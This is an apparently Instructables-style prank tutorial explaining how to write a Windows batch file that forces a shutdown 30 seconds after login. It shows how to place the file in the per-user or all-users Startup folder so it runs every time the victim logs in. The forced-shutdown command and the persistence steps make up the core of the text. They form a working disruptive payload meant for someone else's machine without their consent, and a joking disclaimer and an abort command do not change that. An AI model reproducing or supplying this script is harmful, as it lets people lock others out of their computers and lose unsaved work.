This prank will leave your victims frothing! In 3 easy steps, we'll create a batch file that will frustrate any sane (or insane) person! No fancy software required - just our good old friend Notepad! Sadly, this prank only works on Windows. Read on to begin your journey to the dark side!*

*NOTE: This prank should not be attempted at serious times, such as project deadlines, college application deadlines, or the day before the victim's IB essay is due. You have to have ninja-quick skillz to disable it, so don't plan to leave the house for a full day the first day this terrible little program is installed. Use of the Instructable's content is at your own risk.

Step 1: Begin

To start our diabolical deed, we'll open up Notepad to a blank file.

Step 2: Code

We need to code our little file to do something evil! So, we'll equip it with our terrible code:

shutdown -s -f -t 30 -c "Your computer has been TERMINATED!"

Your computer has been TERMINATED! is just a sample diabolical comment. In their last 30 seconds of life on the computer, you can put any scary message.

Step 3: Save

We need to make it so that this will pop up when the computer is started, so if we want it to do it for only one user, we'll save our code as a .bat file in the following directory:

C:\Users\username\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Startup

BUT, if we want to go a step further and make it so that all the users will be affected, we'll save it in this directory:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Step 4: Watch

Watch as the victim(s) angrily are shut off of their computer! You can silently cackle evilly in a dark corner while your Jacob's ladders climb up and down and your strange chemicals froth. Great job, you've infuriated at least one person! Now, if it gets too serious, then you can heroically, while the computer has not been shut down, quickly open up Command Prompt and type the following code, then press enter:

shutdown -a

This will cancel the shutdown, leaving you free to delete the file. Well, congrats! You've now made something useful of your day, and are ready to progress to more evil feats. World domination, perhaps..?
